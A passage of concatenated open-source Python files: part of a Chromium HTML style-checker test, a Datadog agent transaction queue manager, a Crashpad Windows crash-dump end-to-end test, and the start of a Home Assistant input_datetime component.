self.ShouldFailCheck(line, self.checker.I18nContentJavaScriptCaseCheck)
def testI18nContentJavaScriptCaseCheckPasses(self):
lines = [
' i18n-content="abc" ',
'i18n-content="fooBar"',
'i18n-content="validName" attr="invalidName_"',
'<div i18n-content="exampleTitle"',
]
for line in lines:
self.ShouldPassCheck(line, self.checker.I18nContentJavaScriptCaseCheck)
def testImportCorrectPolymerHtmlFails(self):
bad_url = 'chrome://resources/polymer/v1_0/polymer/polymer.html'
lines = [
'<link rel="import" href="%s">' % bad_url,
'<link href="%s" rel="import">' % bad_url,
]
for line in lines:
self.ShouldFailCheck(line, self.checker.ImportCorrectPolymerHtml)
def testImportCorrectPolymerHtmlPasses(self):
good_url = 'chrome://resources/html/polymer.html'
lines = [
'<link rel="import" href="%s">' % good_url,
'<link href="%s" rel="import">' % good_url,
]
for line in lines:
self.ShouldPassCheck(line, self.checker.ImportCorrectPolymerHtml)
def testLabelCheckFails(self):
lines = [
' <label for="abc"',
" <label for= ",
" <label\tfor= ",
' <label\n blah="1" blee="3"\n for="goop"',
]
for line in lines:
self.ShouldFailCheck(line, self.checker.LabelCheck)
def testLabelCheckPasses(self):
lines = [
' my-for="abc" ',
' myfor="abc" ',
" <for",
' <paper-tooltip for="id-name"',
]
for line in lines:
self.ShouldPassCheck(line, self.checker.LabelCheck)
def testQuotePolymerBindingsFails(self):
lines = [
"<a href=[[blah]]>",
"<div class$=[[class_]]>",
"<settings-checkbox prefs={{prefs}}",
"<paper-button actionable$=[[isActionable_(a,b)]]>",
]
for line in lines:
self.ShouldFailCheck(line, self.checker.QuotePolymerBindings)
def testQuotePolymerBindingsPasses(self):
lines = [
'<a href="[[blah]]">',
'<span id="blah">[[text]]</span>',
'<setting-checkbox prefs="{{prefs}}">',
'<paper-input tab-index="[[tabIndex_]]">',
'<div style="font: [[getFont_(item)]]">',
]
for line in lines:
self.ShouldPassCheck(line, self.checker.QuotePolymerBindings)
if __name__ == '__main__':
unittest.main()
|
|
# (C) Datadog, Inc. 2010-2016
# All rights reserved
# Licensed under Simplified BSD License (see LICENSE)
# stdlib
from datetime import datetime, timedelta
import logging
from operator import attrgetter
import sys
import time
# project
from checks.check_status import ForwarderStatus
from util import get_tornado_ioloop, plural
log = logging.getLogger(__name__)
FLUSH_LOGGING_PERIOD = 20
FLUSH_LOGGING_INITIAL = 5
class Transaction(object):
def __init__(self):
self._id = None
self._error_count = 0
self._next_flush = datetime.utcnow()
self._size = None
def get_id(self):
return self._id
def set_id(self, new_id):
assert self._id is None
self._id = new_id
def inc_error_count(self):
self._error_count = self._error_count + 1
def get_error_count(self):
return self._error_count
def get_size(self):
if self._size is None:
self._size = sys.getsizeof(self)
return self._size
def get_next_flush(self):
return self._next_flush
def compute_next_flush(self,max_delay):
# Transactions are replayed, try to send them faster for newer transactions
# Send them every MAX_WAIT_FOR_REPLAY at most
td = timedelta(seconds=self._error_count * 20)
if td > max_delay:
td = max_delay
newdate = datetime.utcnow() + td
self._next_flush = newdate.replace(microsecond=0)
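    # Worked example (illustrative): after 3 errors the raw backoff is
    # timedelta(seconds=3 * 20) = 60s; if max_delay is, say, 30s, the delay is
    # capped there, so the next flush is scheduled ~30s from now (microseconds dropped).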
    def time_to_flush(self, now=None):
        # resolve the default at call time; a default argument value would be frozen at import time
        return self._next_flush <= (now or datetime.utcnow())
def flush(self):
raise NotImplementedError("To be implemented in a subclass")
class TransactionManager(object):
"""Holds any transaction derived object list and make sure they
are all commited, without exceeding parameters (throttling, memory consumption) """
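    # Usage sketch (illustrative values; the concrete Transaction subclass must
    # implement flush() and, for error handling, carry an _endpoint attribute):
    #
    #   manager = TransactionManager(max_wait_for_replay=timedelta(seconds=90),
    #                                max_queue_size=30 * 1024 * 1024,
    #                                throttling_delay=timedelta(milliseconds=500))
    #   manager.append(my_transaction)   # queue it
    #   manager.flush()                  # flush everything whose time_to_flush() is due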
def __init__(self, max_wait_for_replay, max_queue_size, throttling_delay,
max_parallelism=1, max_endpoint_errors=4):
self._MAX_WAIT_FOR_REPLAY = max_wait_for_replay
self._MAX_QUEUE_SIZE = max_queue_size
self._THROTTLING_DELAY = throttling_delay
self._MAX_PARALLELISM = max_parallelism
self._MAX_ENDPOINT_ERRORS = max_endpoint_errors
self._flush_without_ioloop = False # useful for tests
        self._transactions = []  # List of all non-committed transactions
        self._total_count = 0  # Maintain size/count so we don't recompute them every time
self._total_size = 0
self._flush_count = 0
self._running_flushes = 0
self._transactions_received = 0
self._transactions_flushed = 0
self._too_big_count = 0
# Global counter to assign a number to each transaction: we may have an issue
# if this overlaps
self._counter = 0
self._trs_to_flush = None # Current transactions being flushed
self._last_flush = datetime.utcnow() # Last flush (for throttling)
# Error management
self._endpoints_errors = {}
self._finished_flushes = 0
# Track an initial status message.
ForwarderStatus().persist()
def get_transactions(self):
return self._transactions
def print_queue_stats(self):
log.debug("Queue size: at %s, %s transaction(s), %s KB" %
(time.time(), self._total_count, (self._total_size/1024)))
def get_tr_id(self):
self._counter = self._counter + 1
return self._counter
def append(self,tr):
# Give the transaction an id
tr.set_id(self.get_tr_id())
# Check the size
tr_size = tr.get_size()
log.debug("New transaction to add, total size of queue would be: %s KB" %
((self._total_size + tr_size) / 1024))
if (self._total_size + tr_size) > self._MAX_QUEUE_SIZE:
log.warn("Queue is too big, removing old transactions...")
new_trs = sorted(self._transactions,key=attrgetter('_next_flush'), reverse = True)
for tr2 in new_trs:
if (self._total_size + tr_size) > self._MAX_QUEUE_SIZE:
self._transactions.remove(tr2)
self._total_count = self._total_count - 1
self._total_size = self._total_size - tr2.get_size()
log.warn("Removed transaction %s from queue" % tr2.get_id())
# Done
self._transactions.append(tr)
self._total_count += 1
self._transactions_received += 1
self._total_size = self._total_size + tr_size
log.debug("Transaction %s added" % (tr.get_id()))
self.print_queue_stats()
def flush(self):
if self._trs_to_flush is not None:
log.debug("A flush is already in progress, not doing anything")
return
to_flush = []
# Do we have something to do ?
now = datetime.utcnow()
for tr in self._transactions:
if tr.time_to_flush(now):
to_flush.append(tr)
count = len(to_flush)
should_log = self._flush_count + 1 <= FLUSH_LOGGING_INITIAL or (self._flush_count + 1) % FLUSH_LOGGING_PERIOD == 0
if count > 0:
if should_log:
log.info("Flushing %s transaction%s during flush #%s" % (count,plural(count), str(self._flush_count + 1)))
else:
log.debug("Flushing %s transaction%s during flush #%s" % (count,plural(count), str(self._flush_count + 1)))
self._endpoints_errors = {}
self._finished_flushes = 0
# We sort LIFO-style, taking into account errors
self._trs_to_flush = sorted(to_flush, key=lambda tr: (- tr._error_count, tr._id))
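            # Example (illustrative): ids [5, 3, 4] with error counts [0, 2, 1] sort by
            # (-error_count, id) to the order [3, 4, 5]; since flush_next() pops from the
            # end of the list, the newest transaction with the fewest errors goes out first.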
self._flush_time = datetime.utcnow()
self.flush_next()
else:
if should_log:
log.info("No transaction to flush during flush #%s" % str(self._flush_count + 1))
else:
log.debug("No transaction to flush during flush #%s" % str(self._flush_count + 1))
if self._flush_count + 1 == FLUSH_LOGGING_INITIAL:
log.info("First flushes done, next flushes will be logged every %s flushes." % FLUSH_LOGGING_PERIOD)
self._flush_count += 1
ForwarderStatus(
queue_length=self._total_count,
queue_size=self._total_size,
flush_count=self._flush_count,
transactions_received=self._transactions_received,
transactions_flushed=self._transactions_flushed,
too_big_count=self._too_big_count).persist()
def flush_next(self):
if self._trs_to_flush is not None and len(self._trs_to_flush) > 0:
td = self._last_flush + self._THROTTLING_DELAY - datetime.utcnow()
delay = td.total_seconds()
if delay <= 0 and self._running_flushes < self._MAX_PARALLELISM:
tr = self._trs_to_flush.pop()
self._running_flushes += 1
self._last_flush = datetime.utcnow()
log.debug("Flushing transaction %d", tr.get_id())
try:
tr.flush()
except Exception as e:
log.exception(e)
self.tr_error(tr)
self.flush_next()
# Every running flushes relaunches a flush once it's finished
# If we are already at MAX_PARALLELISM, do nothing
# Otherwise, schedule a flush as soon as possible (throttling)
elif self._running_flushes < self._MAX_PARALLELISM:
# Wait a little bit more
tornado_ioloop = get_tornado_ioloop()
if tornado_ioloop._running:
tornado_ioloop.add_timeout(time.time() + delay,
lambda: self.flush_next())
elif self._flush_without_ioloop:
                # Tornado is not started (i.e., unittests), do it manually: BLOCKING
time.sleep(delay)
self.flush_next()
# Setting self._trs_to_flush to None means the flush is over.
        # So it is only set when there are no more running flushes.
# (which corresponds to the last flush calling flush_next)
elif self._running_flushes == 0:
self._trs_to_flush = None
log.debug('Flush %s took %ss (%s transactions)',
self._flush_count,
(datetime.utcnow() - self._flush_time).total_seconds(),
self._finished_flushes)
else:
log.debug("Flush in progress, %s flushes running", self._running_flushes)
def tr_error(self, tr):
self._running_flushes -= 1
self._finished_flushes += 1
tr.inc_error_count()
tr.compute_next_flush(self._MAX_WAIT_FOR_REPLAY)
log.warn("Transaction %d in error (%s error%s), it will be replayed after %s",
tr.get_id(),
tr.get_error_count(),
plural(tr.get_error_count()),
tr.get_next_flush())
self._endpoints_errors[tr._endpoint] = self._endpoints_errors.get(tr._endpoint, 0) + 1
        # Endpoint failed too many times, it's probably an endpoint issue
# Let's avoid blocking on it
if self._endpoints_errors[tr._endpoint] == self._MAX_ENDPOINT_ERRORS:
new_trs_to_flush = []
for transaction in self._trs_to_flush:
if transaction._endpoint != tr._endpoint:
new_trs_to_flush.append(transaction)
else:
transaction.compute_next_flush(self._MAX_WAIT_FOR_REPLAY)
log.debug('Endpoint %s seems down, removed %s transaction from current flush',
tr._endpoint,
len(self._trs_to_flush) - len(new_trs_to_flush))
self._trs_to_flush = new_trs_to_flush
def tr_error_too_big(self, tr):
self._running_flushes -= 1
self._finished_flushes += 1
tr.inc_error_count()
log.warn("Transaction %d is %sKB, it has been rejected as too large. "
"It will not be replayed.",
tr.get_id(),
tr.get_size() / 1024)
self._transactions.remove(tr)
self._total_count -= 1
self._total_size -= tr.get_size()
self._transactions_flushed += 1
self.print_queue_stats()
self._too_big_count += 1
ForwarderStatus(
queue_length=self._total_count,
queue_size=self._total_size,
flush_count=self._flush_count,
transactions_received=self._transactions_received,
transactions_flushed=self._transactions_flushed,
too_big_count=self._too_big_count).persist()
def tr_success(self, tr):
self._running_flushes -= 1
self._finished_flushes += 1
log.debug("Transaction %d completed", tr.get_id())
self._transactions.remove(tr)
self._total_count -= 1
self._total_size -= tr.get_size()
self._transactions_flushed += 1
self.print_queue_stats()
|
|
#!/usr/bin/env python
# Copyright 2015 The Crashpad Authors. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import print_function
import os
import platform
import pywintypes
import random
import re
import subprocess
import sys
import tempfile
import time
import win32con
import win32pipe
import winerror
g_temp_dirs = []
g_had_failures = False
def MakeTempDir():
global g_temp_dirs
new_dir = tempfile.mkdtemp()
g_temp_dirs.append(new_dir)
return new_dir
def CleanUpTempDirs():
global g_temp_dirs
for d in g_temp_dirs:
subprocess.call(['rmdir', '/s', '/q', d], shell=True)
def FindInstalledWindowsApplication(app_path):
search_paths = [
os.getenv('PROGRAMFILES(X86)'),
os.getenv('PROGRAMFILES'),
os.getenv('PROGRAMW6432'),
os.getenv('LOCALAPPDATA')
]
search_paths += os.getenv('PATH', '').split(os.pathsep)
for search_path in search_paths:
if not search_path:
continue
path = os.path.join(search_path, app_path)
if os.path.isfile(path):
return path
return None
def GetCdbPath():
"""Search in some reasonable places to find cdb.exe. Searches x64 before x86
and newer versions before older versions.
"""
possible_paths = (
os.path.join('Windows Kits', '10', 'Debuggers', 'x64'),
os.path.join('Windows Kits', '10', 'Debuggers', 'x86'),
os.path.join('Windows Kits', '8.1', 'Debuggers', 'x64'),
os.path.join('Windows Kits', '8.1', 'Debuggers', 'x86'),
os.path.join('Windows Kits', '8.0', 'Debuggers', 'x64'),
os.path.join('Windows Kits', '8.0', 'Debuggers', 'x86'),
'Debugging Tools For Windows (x64)',
'Debugging Tools For Windows (x86)',
'Debugging Tools For Windows',
)
for possible_path in possible_paths:
app_path = os.path.join(possible_path, 'cdb.exe')
app_path = FindInstalledWindowsApplication(app_path)
if app_path:
return app_path
return None
def NamedPipeExistsAndReady(pipe_name):
"""Returns False if pipe_name does not exist. If pipe_name does exist,
blocks until the pipe is ready to service clients, and then returns True.
This is used as a drop-in replacement for os.path.exists() and os.access()
to test for the pipe's existence. Both of those calls tickle the pipe in a
way that appears to the server to be a client connecting, triggering error
messages when no data is received.
Although this function only needs to test pipe existence (waiting for
CreateNamedPipe()), it actually winds up testing pipe readiness (waiting for
ConnectNamedPipe()). This is unnecessary but harmless.
"""
try:
win32pipe.WaitNamedPipe(pipe_name, win32pipe.NMPWAIT_WAIT_FOREVER)
except pywintypes.error as e:
if e[0] == winerror.ERROR_FILE_NOT_FOUND:
return False
raise
return True
def GetDumpFromProgram(out_dir, pipe_name, executable_name, expect_exit_code,
*args):
"""Initialize a crash database, and run |executable_name| connecting to a
crash handler. If pipe_name is set, crashpad_handler will be started first.
If pipe_name is empty, the executable is responsible for starting
crashpad_handler. *args will be passed after other arguments to
executable_name. If the child process does not exit with |expect_exit_code|,
an exception will be raised. Returns the path to the minidump generated by
crashpad_handler for further testing.
"""
test_database = MakeTempDir()
handler = None
try:
subprocess.check_call([
os.path.join(out_dir, 'crashpad_database_util.exe'), '--create',
'--database=' + test_database
])
if pipe_name is not None:
handler = subprocess.Popen([
os.path.join(out_dir, 'crashpad_handler.com'),
'--pipe-name=' + pipe_name, '--database=' + test_database
])
# Wait until the server is ready.
printed = False
while not NamedPipeExistsAndReady(pipe_name):
if not printed:
print('Waiting for crashpad_handler to be ready...')
printed = True
time.sleep(0.001)
command = [os.path.join(out_dir, executable_name), pipe_name
] + list(args)
else:
command = ([
os.path.join(out_dir, executable_name),
os.path.join(out_dir, 'crashpad_handler.com'), test_database
] + list(args))
print('Running %s' % os.path.basename(command[0]))
exit_code = subprocess.call(command)
if exit_code != expect_exit_code:
raise subprocess.CalledProcessError(exit_code, executable_name)
out = subprocess.check_output([
os.path.join(out_dir, 'crashpad_database_util.exe'),
'--database=' + test_database,
'--show-pending-reports',
'--show-all-report-info',
])
for line in out.splitlines():
if line.strip().startswith('Path:'):
return line.partition(':')[2].strip()
finally:
if handler:
handler.kill()
def GetDumpFromCrashyProgram(out_dir, pipe_name):
return GetDumpFromProgram(out_dir, pipe_name, 'crashy_program.exe',
win32con.EXCEPTION_ACCESS_VIOLATION)
def GetDumpFromOtherProgram(out_dir, pipe_name, *args):
return GetDumpFromProgram(out_dir, pipe_name, 'crash_other_program.exe', 0,
*args)
def GetDumpFromSignal(out_dir, pipe_name, *args):
STATUS_FATAL_APP_EXIT = 0x40000015 # Not known by win32con.
return GetDumpFromProgram(out_dir, pipe_name, 'crashy_signal.exe',
STATUS_FATAL_APP_EXIT, *args)
def GetDumpFromSelfDestroyingProgram(out_dir, pipe_name):
return GetDumpFromProgram(out_dir, pipe_name, 'self_destroying_program.exe',
win32con.EXCEPTION_BREAKPOINT)
def GetDumpFromZ7Program(out_dir, pipe_name):
return GetDumpFromProgram(out_dir, pipe_name, 'crashy_z7_loader.exe',
win32con.EXCEPTION_ACCESS_VIOLATION)
class CdbRun(object):
"""Run cdb.exe passing it a cdb command and capturing the output.
`Check()` searches for regex patterns in sequence allowing verification of
expected output.
"""
def __init__(self, cdb_path, dump_path, command):
# Run a command line that loads the dump, runs the specified cdb
        # command, and then quits, capturing stdout.
self.out = subprocess.check_output(
[cdb_path, '-z', dump_path, '-c', command + ';q'])
def Check(self, pattern, message, re_flags=0):
match_obj = re.search(pattern, self.out, re_flags)
if match_obj:
# Matched. Consume up to end of match.
self.out = self.out[match_obj.end(0):]
print('ok - %s' % message)
sys.stdout.flush()
else:
print('-' * 80, file=sys.stderr)
print('FAILED - %s' % message, file=sys.stderr)
print('-' * 80, file=sys.stderr)
print('did not match:\n %s' % pattern, file=sys.stderr)
print('-' * 80, file=sys.stderr)
print('remaining output was:\n %s' % self.out, file=sys.stderr)
print('-' * 80, file=sys.stderr)
sys.stderr.flush()
global g_had_failures
g_had_failures = True
def Find(self, pattern, re_flags=0):
match_obj = re.search(pattern, self.out, re_flags)
if match_obj:
# Matched. Consume up to end of match.
self.out = self.out[match_obj.end(0):]
return match_obj
return None
def RunTests(cdb_path, dump_path, start_handler_dump_path, destroyed_dump_path,
z7_dump_path, other_program_path, other_program_no_exception_path,
sigabrt_main_path, sigabrt_background_path, pipe_name):
"""Runs various tests in sequence. Runs a new cdb instance on the dump for
each block of tests to reduce the chances that output from one command is
confused for output from another.
"""
out = CdbRun(cdb_path, dump_path, '.ecxr')
out.Check('This dump file has an exception of interest stored in it',
'captured exception')
# When SomeCrashyFunction is inlined, cdb doesn't demangle its namespace as
# "`anonymous namespace'" and instead gives the decorated form.
out.Check(
'crashy_program!crashpad::(`anonymous namespace\'|\?A0x[0-9a-f]+)::'
'SomeCrashyFunction', 'exception at correct location')
out = CdbRun(cdb_path, start_handler_dump_path, '.ecxr')
out.Check('This dump file has an exception of interest stored in it',
'captured exception (using StartHandler())')
out.Check(
'crashy_program!crashpad::(`anonymous namespace\'|\?A0x[0-9a-f]+)::'
'SomeCrashyFunction',
'exception at correct location (using StartHandler())')
out = CdbRun(cdb_path, dump_path, '!peb')
out.Check(r'PEB at', 'found the PEB')
out.Check(r'Ldr\.InMemoryOrderModuleList:.*\d+ \. \d+',
'PEB_LDR_DATA saved')
out.Check(r'Base TimeStamp Module',
'module list present')
pipe_name_escaped = pipe_name.replace('\\', '\\\\')
out.Check(r'CommandLine: *\'.*crashy_program\.exe *' + pipe_name_escaped,
'some PEB data is correct')
out.Check(r'SystemRoot=C:\\Windows', 'some of environment captured',
re.IGNORECASE)
out = CdbRun(cdb_path, dump_path, '?? @$peb->ProcessParameters')
out.Check(r' ImagePathName *: _UNICODE_STRING ".*\\crashy_program\.exe"',
'PEB->ProcessParameters.ImagePathName string captured')
out.Check(
' DesktopInfo *: '
'_UNICODE_STRING "(?!--- memory read error at address ).*"',
'PEB->ProcessParameters.DesktopInfo string captured')
out = CdbRun(cdb_path, dump_path, '!teb')
out.Check(r'TEB at', 'found the TEB')
out.Check(r'ExceptionList:\s+[0-9a-fA-F]+', 'some valid teb data')
out.Check(r'LastErrorValue:\s+2', 'correct LastErrorValue')
out = CdbRun(cdb_path, dump_path, '!gle')
out.Check(
'LastErrorValue: \(Win32\) 0x2 \(2\) - The system cannot find the '
'file specified.', '!gle gets last error')
out.Check(
'LastStatusValue: \(NTSTATUS\) 0xc000000f - {File Not Found} The '
'file %hs does not exist.', '!gle gets last ntstatus')
if False:
# TODO(scottmg): Re-enable when we grab ntdll!RtlCriticalSectionList.
out = CdbRun(cdb_path, dump_path, '!locks')
out.Check(
r'CritSec crashy_program!crashpad::`anonymous namespace\'::'
r'g_test_critical_section', 'lock was captured')
if platform.win32_ver()[0] != '7':
# We can't allocate CRITICAL_SECTIONs with .DebugInfo on Win 7.
out.Check(r'\*\*\* Locked',
'lock debug info was captured, and is locked')
out = CdbRun(cdb_path, dump_path, '!handle')
out.Check(r'\d+ Handles', 'captured handles')
out.Check(r'Event\s+\d+', 'capture some event handles')
out.Check(r'File\s+\d+', 'capture some file handles')
out = CdbRun(cdb_path, dump_path, 'lm')
out.Check(r'Unloaded modules:', 'captured some unloaded modules')
out.Check(r'lz32\.dll', 'found expected unloaded module lz32')
out.Check(r'wmerror\.dll', 'found expected unloaded module wmerror')
out = CdbRun(cdb_path, destroyed_dump_path, '.ecxr;!peb;k 2')
out.Check(r'Ldr\.InMemoryOrderModuleList:.*\d+ \. \d+',
'PEB_LDR_DATA saved')
out.Check(r'ntdll\.dll', 'ntdll present', re.IGNORECASE)
# Check that there is no stack trace in the self-destroyed process. Confirm
# that the top is where we expect it (that's based only on IP), but
# subsequent stack entries will not be available. This confirms that we have
# a mostly valid dump, but that the stack was omitted.
out.Check(
r'self_destroying_program!crashpad::`anonymous namespace\'::'
r'FreeOwnStackAndBreak.*\nquit:',
'at correct location, no additional stack entries')
  # Dump memory pointed to by EDI on the background suspended thread. We don't
# know the index of the thread because the system may have started other
# threads, so first do a run to extract the thread index that's suspended,
# and then another run to dump the data pointed to by EDI for that thread.
out = CdbRun(cdb_path, dump_path, '.ecxr;~')
match_obj = out.Find(r'(\d+)\s+Id: [0-9a-f.]+ Suspend: 1 Teb:')
if match_obj:
thread = match_obj.group(1)
out = CdbRun(cdb_path, dump_path, '.ecxr;~' + thread + 's;db /c14 edi')
out.Check(r'63 62 61 60 5f 5e 5d 5c-5b 5a 59 58 57 56 55 54 53 52 51 50',
'data pointed to by registers captured')
# Move up one stack frame after jumping to the exception, and examine
# memory.
out = CdbRun(cdb_path, dump_path,
'.ecxr; .f+; dd /c100 poi(offset_pointer)-20')
out.Check(
r'80000078 00000079 8000007a 0000007b 8000007c 0000007d 8000007e '
r'0000007f 80000080 00000081 80000082 00000083 80000084 00000085 '
r'80000086 00000087 80000088 00000089 8000008a 0000008b 8000008c '
r'0000008d 8000008e 0000008f 80000090 00000091 80000092 00000093 '
r'80000094 00000095 80000096 00000097',
'data pointed to by stack captured')
# Attempt to retrieve the value of g_extra_memory_pointer (by name), and
# then examine the memory at which it points. Both should have been saved.
out = CdbRun(
cdb_path, dump_path,
'dd poi(crashy_program!crashpad::g_extra_memory_pointer)+0x1f30 '
'L8')
out.Check(r'0000655e 0000656b 00006578 00006585',
'extra memory range captured')
out = CdbRun(cdb_path, dump_path, '.dumpdebug')
out.Check(r'type \?\?\? \(333333\), size 00001000', 'first user stream')
out.Check(r'type \?\?\? \(222222\), size 00000080', 'second user stream')
if z7_dump_path:
out = CdbRun(cdb_path, z7_dump_path, '.ecxr;lm')
out.Check('This dump file has an exception of interest stored in it',
'captured exception in z7 module')
# Older versions of cdb display relative to exports for /Z7 modules,
# newer ones just display the offset.
out.Check(r'z7_test(!CrashMe\+0xe|\+0x100e):',
'exception in z7 at correct location')
out.Check(r'z7_test C \(codeview symbols\) z7_test\.dll',
'expected non-pdb symbol format')
out = CdbRun(cdb_path, other_program_path, '.ecxr;k;~')
out.Check('Unknown exception - code deadbea7',
'other program dump exception code')
out.Check('!Sleep', 'other program reasonable location')
out.Check("hanging_program!`anonymous namespace'::Thread1",
'other program dump right thread')
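  # Walk the "~" thread list: every thread in this dump should have a suspend
  # count of 0, and the hanging program is expected to have more than two
  # threads.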
count = 0
while True:
match_obj = out.Find(r'Id.*Suspend: (\d+) ')
if match_obj:
if match_obj.group(1) != '0':
out.Check(r'FAILED', 'all suspend counts should be 0')
else:
count += 1
else:
break
assert count > 2
out = CdbRun(cdb_path, other_program_no_exception_path, '.ecxr;k')
out.Check('Unknown exception - code 0cca11ed',
'other program with no exception given')
out.Check('!RaiseException', 'other program in RaiseException()')
out = CdbRun(cdb_path, sigabrt_main_path, '.ecxr')
out.Check('code 40000015', 'got sigabrt signal')
  out.Check('::HandleAbortSignal', 'stack in expected location')
out = CdbRun(cdb_path, sigabrt_background_path, '.ecxr')
out.Check('code 40000015', 'got sigabrt signal from background thread')
def main(args):
try:
if len(args) != 1:
print('must supply binary dir', file=sys.stderr)
return 1
cdb_path = GetCdbPath()
if not cdb_path:
print('could not find cdb', file=sys.stderr)
return 1
# Make sure we can download Windows symbols.
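    # _NT_SYMBOL_PATH uses the symbol-server syntax
    # "SRV*<local cache dir>*<server URL>", so downloaded symbols get cached
    # in the temporary directory.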
if not os.environ.get('_NT_SYMBOL_PATH'):
symbol_dir = MakeTempDir()
protocol = 'https' if platform.win32_ver()[0] != 'XP' else 'http'
os.environ['_NT_SYMBOL_PATH'] = (
'SRV*' + symbol_dir + '*' + protocol +
'://msdl.microsoft.com/download/symbols')
pipe_name = r'\\.\pipe\end-to-end_%s_%s' % (os.getpid(),
str(random.getrandbits(64)))
crashy_dump_path = GetDumpFromCrashyProgram(args[0], pipe_name)
if not crashy_dump_path:
return 1
start_handler_dump_path = GetDumpFromCrashyProgram(args[0], None)
if not start_handler_dump_path:
return 1
destroyed_dump_path = GetDumpFromSelfDestroyingProgram(
args[0], pipe_name)
if not destroyed_dump_path:
return 1
z7_dump_path = None
if not args[0].endswith('_x64'):
z7_dump_path = GetDumpFromZ7Program(args[0], pipe_name)
if not z7_dump_path:
return 1
other_program_path = GetDumpFromOtherProgram(args[0], pipe_name)
if not other_program_path:
return 1
other_program_no_exception_path = GetDumpFromOtherProgram(
args[0], pipe_name, 'noexception')
if not other_program_no_exception_path:
return 1
sigabrt_main_path = GetDumpFromSignal(args[0], pipe_name, 'main')
if not sigabrt_main_path:
return 1
sigabrt_background_path = GetDumpFromSignal(args[0], pipe_name,
'background')
if not sigabrt_background_path:
return 1
RunTests(cdb_path, crashy_dump_path, start_handler_dump_path,
destroyed_dump_path, z7_dump_path, other_program_path,
other_program_no_exception_path, sigabrt_main_path,
sigabrt_background_path, pipe_name)
return 1 if g_had_failures else 0
finally:
CleanUpTempDirs()
if __name__ == '__main__':
sys.exit(main(sys.argv[1:]))
|
|
"""Support to select a date and/or a time."""
import logging
import datetime
import voluptuous as vol
from homeassistant.const import ATTR_DATE, ATTR_TIME, CONF_ICON, CONF_NAME
import homeassistant.helpers.config_validation as cv
from homeassistant.helpers.config_validation import ENTITY_SERVICE_SCHEMA
from homeassistant.helpers.entity_component import EntityComponent
from homeassistant.helpers.restore_state import RestoreEntity
from homeassistant.util import dt as dt_util
_LOGGER = logging.getLogger(__name__)
DOMAIN = "input_datetime"
ENTITY_ID_FORMAT = DOMAIN + ".{}"
CONF_HAS_DATE = "has_date"
CONF_HAS_TIME = "has_time"
CONF_INITIAL = "initial"
DEFAULT_VALUE = "1970-01-01 00:00:00"
ATTR_DATETIME = "datetime"
SERVICE_SET_DATETIME = "set_datetime"
SERVICE_SET_DATETIME_SCHEMA = ENTITY_SERVICE_SCHEMA.extend(
{
vol.Optional(ATTR_DATE): cv.date,
vol.Optional(ATTR_TIME): cv.time,
vol.Optional(ATTR_DATETIME): cv.datetime,
}
)
def has_date_or_time(conf):
"""Check at least date or time is true."""
if conf[CONF_HAS_DATE] or conf[CONF_HAS_TIME]:
return conf
raise vol.Invalid("Entity needs at least a date or a time")
CONFIG_SCHEMA = vol.Schema(
{
DOMAIN: cv.schema_with_slug_keys(
vol.All(
{
vol.Optional(CONF_NAME): cv.string,
vol.Optional(CONF_HAS_DATE, default=False): cv.boolean,
vol.Optional(CONF_HAS_TIME, default=False): cv.boolean,
vol.Optional(CONF_ICON): cv.icon,
vol.Optional(CONF_INITIAL): cv.string,
},
has_date_or_time,
)
)
},
extra=vol.ALLOW_EXTRA,
)
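# Example configuration.yaml entry (illustrative; any slug key works):
#
#   input_datetime:
#     alarm_time:
#       name: Alarm
#       has_time: true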
async def async_setup(hass, config):
"""Set up an input datetime."""
component = EntityComponent(_LOGGER, DOMAIN, hass)
entities = []
for object_id, cfg in config[DOMAIN].items():
name = cfg.get(CONF_NAME)
has_time = cfg.get(CONF_HAS_TIME)
has_date = cfg.get(CONF_HAS_DATE)
icon = cfg.get(CONF_ICON)
initial = cfg.get(CONF_INITIAL)
entities.append(
InputDatetime(object_id, name, has_date, has_time, icon, initial)
)
if not entities:
return False
async def async_set_datetime_service(entity, call):
"""Handle a call to the input datetime 'set datetime' service."""
time = call.data.get(ATTR_TIME)
date = call.data.get(ATTR_DATE)
dttm = call.data.get(ATTR_DATETIME)
if (
dttm
and (date or time)
or entity.has_date
and not (date or dttm)
or entity.has_time
and not (time or dttm)
):
_LOGGER.error(
"Invalid service data for %s " "input_datetime.set_datetime: %s",
entity.entity_id,
str(call.data),
)
return
if dttm:
date = dttm.date()
time = dttm.time()
entity.async_set_datetime(date, time)
component.async_register_entity_service(
SERVICE_SET_DATETIME, SERVICE_SET_DATETIME_SCHEMA, async_set_datetime_service
)
await component.async_add_entities(entities)
return True
class InputDatetime(RestoreEntity):
"""Representation of a datetime input."""
def __init__(self, object_id, name, has_date, has_time, icon, initial):
"""Initialize a select input."""
self.entity_id = ENTITY_ID_FORMAT.format(object_id)
self._name = name
self.has_date = has_date
self.has_time = has_time
self._icon = icon
self._initial = initial
self._current_datetime = None
async def async_added_to_hass(self):
"""Run when entity about to be added."""
await super().async_added_to_hass()
restore_val = None
# Priority 1: Initial State
if self._initial is not None:
restore_val = self._initial
# Priority 2: Old state
if restore_val is None:
old_state = await self.async_get_last_state()
if old_state is not None:
restore_val = old_state.state
if not self.has_date:
if not restore_val:
restore_val = DEFAULT_VALUE.split()[1]
self._current_datetime = dt_util.parse_time(restore_val)
elif not self.has_time:
if not restore_val:
restore_val = DEFAULT_VALUE.split()[0]
self._current_datetime = dt_util.parse_date(restore_val)
else:
if not restore_val:
restore_val = DEFAULT_VALUE
self._current_datetime = dt_util.parse_datetime(restore_val)
@property
def should_poll(self):
"""If entity should be polled."""
return False
@property
def name(self):
"""Return the name of the select input."""
return self._name
@property
def icon(self):
"""Return the icon to be used for this entity."""
return self._icon
@property
def state(self):
"""Return the state of the component."""
return self._current_datetime
@property
def state_attributes(self):
"""Return the state attributes."""
attrs = {"has_date": self.has_date, "has_time": self.has_time}
if self._current_datetime is None:
return attrs
if self.has_date and self._current_datetime is not None:
attrs["year"] = self._current_datetime.year
attrs["month"] = self._current_datetime.month
attrs["day"] = self._current_datetime.day
if self.has_time and self._current_datetime is not None:
attrs["hour"] = self._current_datetime.hour
attrs["minute"] = self._current_datetime.minute
attrs["second"] = self._current_datetime.second
if not self.has_date:
attrs["timestamp"] = (
self._current_datetime.hour * 3600
+ self._current_datetime.minute * 60
